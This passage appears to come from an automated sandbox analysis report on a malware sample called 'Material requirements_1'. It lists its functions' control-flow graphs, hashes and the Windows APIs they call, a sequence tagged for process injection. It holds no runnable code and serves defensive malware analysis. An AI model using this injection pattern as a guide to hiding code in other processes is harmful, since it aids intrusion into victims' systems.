                        control_flow_graph 1220 4da07b6-4da07b9 1221 4da07bb-4da0855 1220->1221 1222 4da0792-4da07a8 1220->1222 1225 4da088e-4da08ae 1221->1225 1226 4da0857-4da0861 1221->1226 1231 4da08b0-4da08ba 1225->1231 1232 4da08e7-4da0916 1225->1232 1226->1225 1227 4da0863-4da0865 1226->1227 1229 4da0888-4da088b 1227->1229 1230 4da0867-4da0871 1227->1230 1229->1225 1233 4da0873 1230->1233 1234 4da0875-4da0884 1230->1234 1231->1232 1235 4da08bc-4da08be 1231->1235 1242 4da0918-4da0922 1232->1242 1243 4da094f-4da0a09 CreateProcessA 1232->1243 1233->1234 1234->1234 1236 4da0886 1234->1236 1237 4da08c0-4da08ca 1235->1237 1238 4da08e1-4da08e4 1235->1238 1236->1229 1240 4da08ce-4da08dd 1237->1240 1241 4da08cc 1237->1241 1238->1232 1240->1240 1244 4da08df 1240->1244 1241->1240 1242->1243 1245 4da0924-4da0926 1242->1245 1254 4da0a0b-4da0a11 1243->1254 1255 4da0a12-4da0a98 1243->1255 1244->1238 1247 4da0928-4da0932 1245->1247 1248 4da0949-4da094c 1245->1248 1249 4da0936-4da0945 1247->1249 1250 4da0934 1247->1250 1248->1243 1249->1249 1251 4da0947 1249->1251 1250->1249 1251->1248 1254->1255 1265 4da0a9a-4da0a9e 1255->1265 1266 4da0aa8-4da0aac 1255->1266 1265->1266 1269 4da0aa0 1265->1269 1267 4da0aae-4da0ab2 1266->1267 1268 4da0abc-4da0ac0 1266->1268 1267->1268 1270 4da0ab4 1267->1270 1271 4da0ac2-4da0ac6 1268->1271 1272 4da0ad0-4da0ad4 1268->1272 1269->1266 1270->1268 1271->1272 1273 4da0ac8 1271->1273 1274 4da0ae6-4da0aed 1272->1274 1275 4da0ad6-4da0adc 1272->1275 1273->1272 1276 4da0aef-4da0afe 1274->1276 1277 4da0b04 1274->1277 1275->1274 1276->1277 1278 4da0b05 1277->1278 1278->1278
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04DA09F6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088025085.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4da0000_Material requirements_1.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: e1e6c226e8f770e48196ffd99a64f64f95b66b576058e6fa34ae9368cff737f1
                        • Instruction ID: 8f159f3dd3ccbd44a96dc2f8120ba8e238ca68706e1dbd91f5115fe47ae2f4a0
                        • Opcode Fuzzy Hash: e1e6c226e8f770e48196ffd99a64f64f95b66b576058e6fa34ae9368cff737f1
                        • Instruction Fuzzy Hash: E0A16971D00219CFEB25DF68C8417EEBBF2BF48314F1485AAD809A7250DB74A995CF92
                        Function 04DA07C0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1280 4da07c0-4da0855 1282 4da088e-4da08ae 1280->1282 1283 4da0857-4da0861 1280->1283 1288 4da08b0-4da08ba 1282->1288 1289 4da08e7-4da0916 1282->1289 1283->1282 1284 4da0863-4da0865 1283->1284 1286 4da0888-4da088b 1284->1286 1287 4da0867-4da0871 1284->1287 1286->1282 1290 4da0873 1287->1290 1291 4da0875-4da0884 1287->1291 1288->1289 1292 4da08bc-4da08be 1288->1292 1299 4da0918-4da0922 1289->1299 1300 4da094f-4da0a09 CreateProcessA 1289->1300 1290->1291 1291->1291 1293 4da0886 1291->1293 1294 4da08c0-4da08ca 1292->1294 1295 4da08e1-4da08e4 1292->1295 1293->1286 1297 4da08ce-4da08dd 1294->1297 1298 4da08cc 1294->1298 1295->1289 1297->1297 1301 4da08df 1297->1301 1298->1297 1299->1300 1302 4da0924-4da0926 1299->1302 1311 4da0a0b-4da0a11 1300->1311 1312 4da0a12-4da0a98 1300->1312 1301->1295 1304 4da0928-4da0932 1302->1304 1305 4da0949-4da094c 1302->1305 1306 4da0936-4da0945 1304->1306 1307 4da0934 1304->1307 1305->1300 1306->1306 1308 4da0947 1306->1308 1307->1306 1308->1305 1311->1312 1322 4da0a9a-4da0a9e 1312->1322 1323 4da0aa8-4da0aac 1312->1323 1322->1323 1326 4da0aa0 1322->1326 1324 4da0aae-4da0ab2 1323->1324 1325 4da0abc-4da0ac0 1323->1325 1324->1325 1327 4da0ab4 1324->1327 1328 4da0ac2-4da0ac6 1325->1328 1329 4da0ad0-4da0ad4 1325->1329 1326->1323 1327->1325 1328->1329 1330 4da0ac8 1328->1330 1331 4da0ae6-4da0aed 1329->1331 1332 4da0ad6-4da0adc 1329->1332 1330->1329 1333 4da0aef-4da0afe 1331->1333 1334 4da0b04 1331->1334 1332->1331 1333->1334 1335 4da0b05 1334->1335 1335->1335
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04DA09F6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088025085.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4da0000_Material requirements_1.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 1c3801d3ff99dd48b3fc671576b3923f31d15a17aa9a3285c4fada184b21a2a2
                        • Instruction ID: 4556f4e9c1ef2f7155b5f5d617645b93aa9c031bc38a045adb2a6c722c2bb487
                        • Opcode Fuzzy Hash: 1c3801d3ff99dd48b3fc671576b3923f31d15a17aa9a3285c4fada184b21a2a2
                        • Instruction Fuzzy Hash: 25916B71D00219DFEB25DF68C840BDEBBF2BF48314F1485A9D809A7250DB74A995CF92
                        Function 02D0ADA8 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1337 2d0ada8-2d0adb7 1338 2d0ade3-2d0ade7 1337->1338 1339 2d0adb9-2d0adc6 call 2d0a0cc 1337->1339 1340 2d0ade9-2d0adf3 1338->1340 1341 2d0adfb-2d0ae3c 1338->1341 1346 2d0adc8 1339->1346 1347 2d0addc 1339->1347 1340->1341 1348 2d0ae49-2d0ae57 1341->1348 1349 2d0ae3e-2d0ae46 1341->1349 1393 2d0adce call 2d0b040 1346->1393 1394 2d0adce call 2d0b031 1346->1394 1347->1338 1350 2d0ae59-2d0ae5e 1348->1350 1351 2d0ae7b-2d0ae7d 1348->1351 1349->1348 1355 2d0ae60-2d0ae67 call 2d0a0d8 1350->1355 1356 2d0ae69 1350->1356 1354 2d0ae80-2d0ae87 1351->1354 1352 2d0add4-2d0add6 1352->1347 1353 2d0af18-2d0afd8 1352->1353 1388 2d0afe0-2d0b00b GetModuleHandleW 1353->1388 1389 2d0afda-2d0afdd 1353->1389 1358 2d0ae94-2d0ae9b 1354->1358 1359 2d0ae89-2d0ae91 1354->1359 1357 2d0ae6b-2d0ae79 1355->1357 1356->1357 1357->1354 1361 2d0aea8-2d0aeaa call 2d0a0e8 1358->1361 1362 2d0ae9d-2d0aea5 1358->1362 1359->1358 1366 2d0aeaf-2d0aeb1 1361->1366 1362->1361 1368 2d0aeb3-2d0aebb 1366->1368 1369 2d0aebe-2d0aec3 1366->1369 1368->1369 1370 2d0aee1-2d0aeee 1369->1370 1371 2d0aec5-2d0aecc 1369->1371 1377 2d0aef0-2d0af0e 1370->1377 1378 2d0af11-2d0af17 1370->1378 1371->1370 1373 2d0aece-2d0aede call 2d0a0f8 call 2d0a108 1371->1373 1373->1370 1377->1378 1390 2d0b014-2d0b028 1388->1390 1391 2d0b00d-2d0b013 1388->1391 1389->1388 1391->1390 1393->1352 1394->1352
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02D0AFFE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083691334.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2d00000_Material requirements_1.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 48912c453963554924efbbbdeea1292278b9bc27bb86a69adceeff15da933b58
                        • Instruction ID: 523a56d18820780275a29f09f7aba0274b1b3c90164228078c1a1bf23ed195f1
                        • Opcode Fuzzy Hash: 48912c453963554924efbbbdeea1292278b9bc27bb86a69adceeff15da933b58
                        • Instruction Fuzzy Hash: BD710470A00B058FD724DF2AD484B5ABBF5FF48744F10892DD58A97BA0DB75E849CB90
                        Function 02D044C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                        Download Yara Rule
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 02D059C9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083691334.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2d00000_Material requirements_1.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 65c471321af8bca56d624650919f01fcf2b25285b9daec059354896dbff0f3c6
                        • Instruction ID: 4f9d542de295c542534ab58b8590ad602808386836da83114e5d4369eb3c3a6d
                        • Opcode Fuzzy Hash: 65c471321af8bca56d624650919f01fcf2b25285b9daec059354896dbff0f3c6
                        • Instruction Fuzzy Hash: AB41F3B1C0071DCBDB24CFA9C884B9DBBB5BF48304F60806AD418AB265DB75694ACF90
                        Function 02D0590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                        Download Yara Rule
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 02D059C9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083691334.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2d00000_Material requirements_1.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: d6ecaaf36085d5a90f11d8343039fa74aa5dc7d3f14f800dfffb5eb6df1fc956
                        • Instruction ID: 54d948d5b1f1b6b5249f1ba6fbc12af66dd6624e555293a6097d6cbed7158bd4
                        • Opcode Fuzzy Hash: d6ecaaf36085d5a90f11d8343039fa74aa5dc7d3f14f800dfffb5eb6df1fc956
                        • Instruction Fuzzy Hash: 3F41F5B1C0071DCFDB24CFAAD884B9DBBB5BF48304F20805AD408AB255DB75694ACF91
                        Function 05324040 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                        Download Yara Rule
                        APIs
                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05324101
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088519663.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5320000_Material requirements_1.jbxd
                        Similarity
                        • API ID: CallProcWindow
                        • String ID:
                        • API String ID: 2714655100-0
                        • Opcode ID: 9813d8b38b100bb1394025d8a3a1ea550f8f8d699141029ef7c52ee8896b1462
                        • Instruction ID: 00aa7eb133733576d6e3f92df3b21365ff6d938217de6dc5ea35d277179a4087
                        • Opcode Fuzzy Hash: 9813d8b38b100bb1394025d8a3a1ea550f8f8d699141029ef7c52ee8896b1462
                        • Instruction Fuzzy Hash: 4B4117B9A00619DFCB14CF99C848AAAFBF5FF88314F24C459D519A7321D774A841CFA0
                        Function 04DA0538 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                        Download Yara Rule
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04DA05C8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088025085.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4da0000_Material requirements_1.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 61949e4834ec7b79228dd07b28cb05eb358dd4de4bb3a2b3da9f4d6b2dcf8b9e
                        • Instruction ID: cfaad6b8be1db991379934711f2569ae6de71a24ff07c16df14862a5062a9863
                        • Opcode Fuzzy Hash: 61949e4834ec7b79228dd07b28cb05eb358dd4de4bb3a2b3da9f4d6b2dcf8b9e
                        • Instruction Fuzzy Hash: B8213B759003499FCB10DFA9C945BEEBBF5FF48310F10842AE519A7240D778A555CBA0
                        Function 04DA0532 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                        Download Yara Rule
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04DA05C8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088025085.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4da0000_Material requirements_1.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 61a523ffa1793c87ea13a5efa768ce84680686548ddc8e3ad367b18a369e8e61
                        • Instruction ID: 2eb552cb5d700b771c93571cae42ea5248bf1fc41ac9af3fe8877361008d640c
                        • Opcode Fuzzy Hash: 61a523ffa1793c87ea13a5efa768ce84680686548ddc8e3ad367b18a369e8e61
                        • Instruction Fuzzy Hash: 712136B5900309CFDB10DFA9C9857EEBBF1FF48310F10882AE919A7250D778A955DBA0
                        Function 02D0D27C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                        Download Yara Rule
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D0D656,?,?,?,?,?), ref: 02D0D717
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083691334.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2d00000_Material requirements_1.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 03ff832b8884904b53df289c26b1d81af0088645480582d17c2bc8c4460cd0db
                        • Instruction ID: c6012dd0e6ea4e4fdc0a4ca3be561e78c9094dc235882d89edf85c90c93e9328
                        • Opcode Fuzzy Hash: 03ff832b8884904b53df289c26b1d81af0088645480582d17c2bc8c4460cd0db
                        • Instruction Fuzzy Hash: 2721E5B59002489FDB10CFAAD584AEEFBF9FB48310F14841AE918A3350D378A954CFA5
                        Function 02D0D689 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                        Download Yara Rule
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D0D656,?,?,?,?,?), ref: 02D0D717
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083691334.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2d00000_Material requirements_1.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 6debee3aa2db11222d1e4ffdf3b1bb4ecb669b6d73d1dfe84562bb9ec14e1b61
                        • Instruction ID: bcf1139e263ecdf7655196929f843d5ab0f4ae51af3182758403cb5584c9601e
                        • Opcode Fuzzy Hash: 6debee3aa2db11222d1e4ffdf3b1bb4ecb669b6d73d1dfe84562bb9ec14e1b61
                        • Instruction Fuzzy Hash: 9C21E6B59002489FDB10CFAAD584ADEBBF5FF48314F14841AE914A3350D378A945CFA4
                        Function 04DA0628 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                        Download Yara Rule
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04DA06A8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088025085.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4da0000_Material requirements_1.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: e3d396e982f257de6b85a181fc0cca0f7b209b2b8317253aed2aaa77e1c0c319
                        • Instruction ID: 070a9e1882c957468f87a9ec63d980c3ae19437a1cb23d07d51815a39a4858f5
                        • Opcode Fuzzy Hash: e3d396e982f257de6b85a181fc0cca0f7b209b2b8317253aed2aaa77e1c0c319
                        • Instruction Fuzzy Hash: 4C213AB1C003499FCB10DFAAC844AEEFBF5FF48310F14842AE519A7240D778A545CBA5
                        Function 04DA0622 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                        Download Yara Rule
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04DA06A8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088025085.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4da0000_Material requirements_1.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: bba2b6b2c577509f41738bbfcd9fc12b9397e0773a9acab5ed2d56bbf19cb8bb
                        • Instruction ID: 395b95b7e63d6a865f84be9d20b793162df3ca6d31d4a4bca02d9abfb0cfc286
                        • Opcode Fuzzy Hash: bba2b6b2c577509f41738bbfcd9fc12b9397e0773a9acab5ed2d56bbf19cb8bb
                        • Instruction Fuzzy Hash: 852148B58003098FCB10DFA9C4806EEBBF1FF48310F14842AD519A7240C738A545DBA0
                        Function 04DA0478 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04DA04E6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088025085.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4da0000_Material requirements_1.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 4b3d8bef835a41e8e77c61090ba5b9801bd00d1d4d0272ffb8a0c8cce6856c9a
                        • Instruction ID: 4fe3c1c191302dc2fe45ed81f79d9f990cdb2c5782e5bf41e18a6e333f5464e7
                        • Opcode Fuzzy Hash: 4b3d8bef835a41e8e77c61090ba5b9801bd00d1d4d0272ffb8a0c8cce6856c9a
                        • Instruction Fuzzy Hash: D61137758002499FCB20DFAAC844AEFBFF5FF48310F208419E519A7250CB79A554CFA1
                        Function 04DA0472 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04DA04E6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088025085.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4da0000_Material requirements_1.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: f441de51ddb5e389117c81e5c7e7aec2abca558ee2f5945b13b9f27fa26c10e8
                        • Instruction ID: 2e4a6957609d4ac5ebb592fb8e6b4e6540dae31c93962c8fdc132b7b7d398be8
                        • Opcode Fuzzy Hash: f441de51ddb5e389117c81e5c7e7aec2abca558ee2f5945b13b9f27fa26c10e8
                        • Instruction Fuzzy Hash: 2D114975900309CFDB10DFA9C5456EEBBF5FF48310F208419D519A7250CB79A955CFA0
                        Function 0712FED0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 5c7655449714e2292fa8210269d84a91c6d1c5850fb69633325c79d1b0d6f679
                        • Instruction ID: 82697785147ad96c57aa09cb91aa494c3c8da58403f9cd4bfed2404fe9907935
                        • Opcode Fuzzy Hash: 5c7655449714e2292fa8210269d84a91c6d1c5850fb69633325c79d1b0d6f679
                        • Instruction Fuzzy Hash: E21128B59002498BCB20DFAAC5457AEFBF9EF89314F208419D519A7240CB79A545CBA4
                        Function 0712FECA Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: e20deae76252ec9965d5226a4d8f693577c0c299c9c30d5d59b2c85b390500d4
                        • Instruction ID: 3c2622678e4b14661f36ba9184fc0267f6cd0ad1a0d63fe85f937d59258bfa6b
                        • Opcode Fuzzy Hash: e20deae76252ec9965d5226a4d8f693577c0c299c9c30d5d59b2c85b390500d4
                        • Instruction Fuzzy Hash: 091128B59003498FDB14DFA9C5457AEFBF5EF48314F208419C519A7240CB79A546CF94
                        Function 02D0AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02D0AFFE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083691334.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2d00000_Material requirements_1.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: fd453981875d3e3775d03a3f2be282a90794055ec6d1c4e86b93f974278f3d31
                        • Instruction ID: c40e20d23b1e38874136a387c45720595b77e8a559430a7b731b7172d5ed8238
                        • Opcode Fuzzy Hash: fd453981875d3e3775d03a3f2be282a90794055ec6d1c4e86b93f974278f3d31
                        • Instruction Fuzzy Hash: 8911FDB68002498BCB20CF9AC444B9EFBF4AB88214F20842AD528A7750D379A945CFA1
                        Function 04DA3069 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,?,?,?), ref: 04DA30CD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088025085.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4da0000_Material requirements_1.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: a47a23f3c06331998b72efb71a80ec3a1ac8abbd0cf9c6c959695adb8ad5baba
                        • Instruction ID: 43cab573d61f92037afc5cc40926640ba4c3ab03733c94ae4f3b795efe2a32e9
                        • Opcode Fuzzy Hash: a47a23f3c06331998b72efb71a80ec3a1ac8abbd0cf9c6c959695adb8ad5baba
                        • Instruction Fuzzy Hash: 8A1112B9900309CFDB10DF99D585BDEBBF9FB48320F20845AD958A7240C379A985CFA5
                        Function 04DA3070 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,?,?,?), ref: 04DA30CD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088025085.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4da0000_Material requirements_1.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: 5f45f4240dab94b4822784b58612d02043f91dcb16c07c2d342f744f8a4885da
                        • Instruction ID: c035eaab879b331a3c64af8cd65387ff5b0a00652890b651a0bdc2e785bc5c7b
                        • Opcode Fuzzy Hash: 5f45f4240dab94b4822784b58612d02043f91dcb16c07c2d342f744f8a4885da
                        • Instruction Fuzzy Hash: A41103B58003489FDB10DF9AC444BDEBBF8FB48310F20841AE918A3200C379A544CFA5
                        Function 0135D1FC Relevance: .1, Instructions: 76COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083302788.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135d000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fbb3124d725c83bd30df96beefb08292ebe90fddec8efe2a4a6e0141a202d829
                        • Instruction ID: 11d67cf5917d9e174d45543e4f94a46206e65962d8d580ae12ec989703ae486b
                        • Opcode Fuzzy Hash: fbb3124d725c83bd30df96beefb08292ebe90fddec8efe2a4a6e0141a202d829
                        • Instruction Fuzzy Hash: DC210371504244DFDB46DF98D9C0F26BF69FB88728F20C569ED090B256C33AD416CBA2
                        Function 0136D1D4 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083335207.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_136d000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eac94d4bd1269d403b8e879540af0904b6af96950831e40cb46908bb5c663180
                        • Instruction ID: ec9896c4a22410f82c16fa3b6268cb243244eab4fc14906bd2f02a7c1ced9222
                        • Opcode Fuzzy Hash: eac94d4bd1269d403b8e879540af0904b6af96950831e40cb46908bb5c663180
                        • Instruction Fuzzy Hash: E7210771604204DFDB05DF98D5C0F26BB69FB88328F24C56DD9894B35AC37AD446CA61
                        Function 0136D01C Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083335207.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_136d000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e42fc21ff68a34e952cfb60d04b07eaeaeaaba1fe7e999104dc2193230411390
                        • Instruction ID: 935296aaf4c766636bcf7a5b98e03ce56379fa7382a378a424de766f8efb4c9e
                        • Opcode Fuzzy Hash: e42fc21ff68a34e952cfb60d04b07eaeaeaaba1fe7e999104dc2193230411390
                        • Instruction Fuzzy Hash: 51212271604204DFCB15DF68D980B26BF69FB88318F20C56DE98A0B35AC33BD407CAA1
                        Function 0135D1F7 Relevance: .1, Instructions: 57COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083302788.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135d000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d06fae078f3ccc2112caf8552f6b645ede566e603d6c7b0d9faf10800b04cc1c
                        • Instruction ID: 176ca7cdf4a798b4bedae0b2170c0030954c26dcdf45028c936341445f24bf7d
                        • Opcode Fuzzy Hash: d06fae078f3ccc2112caf8552f6b645ede566e603d6c7b0d9faf10800b04cc1c
                        • Instruction Fuzzy Hash: B321DF76404240CFDB06CF44D9C4B16BF72FB88324F24C5A9DD080B256C33AD42ACBA2
                        Function 0136D017 Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083335207.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_136d000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                        • Instruction ID: 4f3e4eb00bb0ce3bc4310016d7608d395d29fa31220f7c283fc5b73dc29d49c7
                        • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                        • Instruction Fuzzy Hash: A711BE75604280CFDB12CF54D5C4B15BF71FB88318F24C6A9D8494B65AC33AD40ACB62
                        Function 0136D1CF Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083335207.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_136d000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
